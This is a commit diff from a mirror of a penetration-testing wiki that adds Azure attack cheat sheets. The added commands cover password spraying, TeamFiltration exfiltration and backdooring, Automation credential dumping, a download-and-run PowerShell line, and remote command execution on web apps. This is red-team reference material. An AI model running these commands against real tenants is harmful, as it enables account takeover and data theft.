swisskyrepo
/
InternalAllTheThings
mirror of https://github.com/swisskyrepo/InternalAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Azure - Pages v0.1

pull/2/head
Swissky 2024-01-03 15:40:20 +01:00
parent bd1fe1e16b
commit 57e99121dc
8 changed files with 172 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
docs/cloud/azure/azure-ad-connect.md
View File

@ -50,6 +50,7 @@ PS > Set-AADIntUserPassword -SourceAnchor "<IMMUTABLE-ID>" -Password "Password"
## Federation ## Federation
* [Golden SAML](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adfs-federation-services/)
## AD Connect - Credentials ## AD Connect - Credentials

15
docs/cloud/azure/azure-devices-users-sp.md
View File

@ -142,6 +142,21 @@ Get-MgInformationProtectionBitlockerRecoveryKey -BitlockerRecoveryKeyId $bitlock
## Service Principals ## Service Principals
```ps1
PS C:\> Get-AzureADServicePrincipal
ObjectId AppId DisplayName
-------- ----- -----------
00221b6f-4387-4f3f-aa85-34316ad7f956 e5e29b8a-85d9-41ea-b8d1-2162bd004528 Tenant Schema Extension App
012f6450-15be-4e45-b8b4-e630f0fb70fe 00000005-0000-0ff1-ce00-000000000000 Microsoft.YammerEnterprise
06ab01eb-3e77-4d14-ae31-322c7730a65b 09abbdfd-ed23-44ee-a2d9-a627aa1c90f3 ProjectWorkManagement
092aaf41-23e8-46eb-8c3d-fc0ee91cc62f 507bc9da-c4e2-40cb-96a7-ac90df92685c Office365Reports
0ac66e69-5502-4406-a294-6dedeadc8cab 2cf9eb86-36b5-49dc-86ae-9a63135dfa8c AzureTrafficManagerandDNS
0c0a6d9d-48c0-4aa7-b484-4e46f77d8ed9 0f698dd4-f011-4d23-a33e-b36416dcb1e6 Microsoft.OfficeClientService
0cbef08e-a4b5-4dd9-865e-8f521c1c5fb4 0469d4cd-df37-4d93-8a61-f8c75b809164 Microsoft Policy Administration Service
0ea80ff0-a9ea-43b6-b876-d5989efd8228 00000009-0000-0000-c000-000000000000 Microsoft Power BI Reporting and Analytics</dev:code>
```
## Other ## Other

18
docs/cloud/azure/azure-enumeration.md
View File

@ -44,6 +44,18 @@
PS C:> Get-AzureInTuneScript PS C:> Get-AzureInTuneScript
PS C:> Show-AzureKeyVaultContent -All PS C:> Show-AzureKeyVaultContent -All
``` ```
* [**Flangvik/TeamFiltration**](https://github.com/Flangvik/TeamFiltration) - TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts
```ps1
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\CookieData.txt --all
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --aad
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --tokens C:\\OutputTokens.txt --onedrive --owa
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --debug --exfil --onedrive
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-teams
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\Clients\2021\FooBar\OSINT\Usernames.txt
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --backdoor
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --database
```
* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - :warning: This repository has not been updated recently - Azure Red Team tool for graphing Azure and Azure Active Directory objects * [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - :warning: This repository has not been updated recently - Azure Red Team tool for graphing Azure and Azure Active Directory objects
* [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) - :warning: This repository has been archived - Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks. * [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) - :warning: This repository has been archived - Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
* [**FSecureLABS/Azurite Explorer**](https://github.com/FSecureLABS/Azurite) - :warning: This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud. * [**FSecureLABS/Azurite Explorer**](https://github.com/FSecureLABS/Azurite) - :warning: This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
@ -112,6 +124,12 @@ The default lockout policy tolerates 10 failed attempts, then lock out an accoun
```powershell ```powershell
o365spray --spray -U usernames.txt -P passwords.txt --count 2 --lockout 5 --domain test.com o365spray --spray -U usernames.txt -P passwords.txt --count 2 --lockout 5 --domain test.com
``` ```
* [Flangvik/TeamFiltration](https://github.com/Flangvik/TeamFiltration)
```powershell
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push --shuffle-users --shuffle-regions
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\Clients\2021\FooBar\Exclude_Emails.txt
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --passwords C:\Clients\2021\FooBar\Generic\Passwords.txt --time-window 13:00-22:00
```
## Azure Services Enumeration ## Azure Services Enumeration

8
docs/cloud/azure/azure-persistence.md
View File

@ -15,6 +15,7 @@
PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>' PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>'
``` ```
## Add Service Principal ## Add Service Principal
* Generate a new service principal password/secret * Generate a new service principal password/secret
@ -32,6 +33,13 @@
``` ```
## Add User to Group
```ps1
Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose
```
## References ## References
* [Maintaining Azure Persistence via automation accounts - Karl Fosaaen - September 12, 2019](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/) * [Maintaining Azure Persistence via automation accounts - Karl Fosaaen - September 12, 2019](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/)

53
docs/cloud/azure/azure-services-container-registry.md Normal file
View File

@ -0,0 +1,53 @@
# Azure Services - Container Registry
## Enumerate
List container registries in the subscription using Azure CLI
```ps1
az login -u user@domain.onmicrosoft.com -p pass
az acr list -o table
```
Login to the Registry
```ps1
acr=<ACRName> # from the previous command
server=$(az acr login -n $acr --expose-token --query loginServer -o tsv)
token=$(az acr login -n $acr --expose-token --query accessToken -o tsv)
docker login $server -u 00000000-0000-0000-0000-000000000000 -p $token
```
List the images in the ACR
```ps1
az acr repository list -n $acr
```
List version tags for an image
```ps1
az acr repository show-tags -n $acr --repository mywebapp
```
Connect to the container registry from a PowerShell console, set the $server and $token variables, and pull the image from the registry
```ps1
# docker login ${registryURI} --username ${username} --password ${password}
$token="<AccessToken>"
$server="<LoginServer>"
docker login $server -u 00000000-0000-0000-0000-000000000000 -p $token
docker pull $server/mywebapp:v1
```
List docker containers inside a registry
```ps1
IEX (New-Object Net.WebClient).downloadstring("https://raw.githubusercontent.com/NetSPI/MicroBurst/master/Misc/Get-AzACR.ps1")
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Internet Explorer\Main" -Name "DisableFirstRunCustomize" -Value 2
Get-AzACR -username ${username} -password ${password} -registry ${registryURI}
```
## References
* [PENTESTING AZURE: RECON TECHNIQUES - April 29, 2022 Stefan Tita](https://securitycafe.ro/2022/04/29/pentesting-azure-recon-techniques/)

50
docs/cloud/azure/azure-services-runbook.md
View File

@ -1,8 +1,16 @@
# Azure Services - Runbook # Azure Services - Runbook and Automation
## Runbook
Runbook must be **SAVED** and **PUBLISHED** before running it. Runbook must be **SAVED** and **PUBLISHED** before running it.
## Create a Runbook ### List the Runbooks
```ps1
Get-AzAutomationAccount | Get-AzAutomationRunbook
```
### Create a Runbook
* Check user right for automation * Check user right for automation
```powershell ```powershell
@ -18,7 +26,27 @@ Runbook must be **SAVED** and **PUBLISHED** before running it.
* Start the Runbook: `Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose` * Start the Runbook: `Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose`
## Persistence via Automation accounts ## Automation Account
### List Automation Accounts
Azure Automation provides a way to automate the repetitive tasks you perform in your Azure environment.
```ps1
Get-AzAutomationAccount
```
### Get Automation Credentials
```ps1
Get-AzAutomationAccount | Get-AzAutomationCredential
Get-AzAutomationAccount | Get-AzAutomationConnection
Get-AzAutomationAccount | Get-AzAutomationCertificate
Get-AzAutomationAccount | Get-AzAutomationVariable
```
### Persistence via Automation Accounts
* Create a new Automation Account * Create a new Automation Account
* "Create Azure Run As account": Yes * "Create Azure Run As account": Yes
@ -39,6 +67,22 @@ Runbook must be **SAVED** and **PUBLISHED** before running it.
``` ```
## Desired State Configuration
### List the DSC
```ps1
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration
```
### Export the configuration
```ps1
$DSCName = ${dscToExport}
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -march $DSCName} | Export-AzAutomationDscConfiguration -OutputFolder (get-location) -Debug
```
## References ## References
* []() * []()

9
docs/cloud/azure/azure-services-storage-blob.md
View File

@ -5,6 +5,7 @@
* Data Tables - `*.table.core.windows.net` * Data Tables - `*.table.core.windows.net`
* Queues - `*.queue.core.windows.net` * Queues - `*.queue.core.windows.net`
## Enumerate blobs ## Enumerate blobs
```powershell ```powershell
@ -13,6 +14,7 @@ PS > Invoke-EnumerateAzureBlobs -Base <SHORT DOMAIN> -OutputFile azureblobs.txt
Found Storage Account - redacted.blob.core.windows.net Found Storage Account - redacted.blob.core.windows.net
``` ```
## List and download blobs ## List and download blobs
```powershell ```powershell
@ -22,6 +24,13 @@ PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name <NAME> -Resou
PS Az> Get-AzStorageBlobContent -Container <NAME> -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context -Blob PS Az> Get-AzStorageBlobContent -Container <NAME> -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context -Blob
``` ```
Retrieve exposed containers with public access
```ps1
PS Az> (Get-AzStorageAccount | Get-AzStorageContainer).cloudBlobContainer | select Uri,@{n='PublicAccess';e={$_.Properties.PublicAccess}}
```
## SAS URL ## SAS URL
* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/) * Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/)

21
docs/cloud/azure/azure-services-web-apps.md
View File

@ -1,8 +1,29 @@
# Azure Services - Web Apps # Azure Services - Web Apps
## List Web App
```ps1
az webapp list
```
## Execute Commands
```ps1
$ARMToken = Get-ARMTokenWithRefreshToken `
-RefreshToken "0.ARwA6WgJJ9X2qk..." `
-TenantID "contoso.onmicrosoft.com"
Invoke-AzureRMWebAppShellCommand `
-KuduURI "https://<webapp>.scm.azurewebsites.net/api/command" `
-Token $ARMToken `
-Command "whoami"
```
## SSH Connection ## SSH Connection
First check if the SSH over HTTP connection is enabled: `(curl https://${appName}?app.scm.azurewebsites.net/webssh/host).statuscode`
```powershell ```powershell
az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-group <RG-NAME> -n <APP-SERVICE-NAME> az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-group <RG-NAME> -n <APP-SERVICE-NAME>
``` ```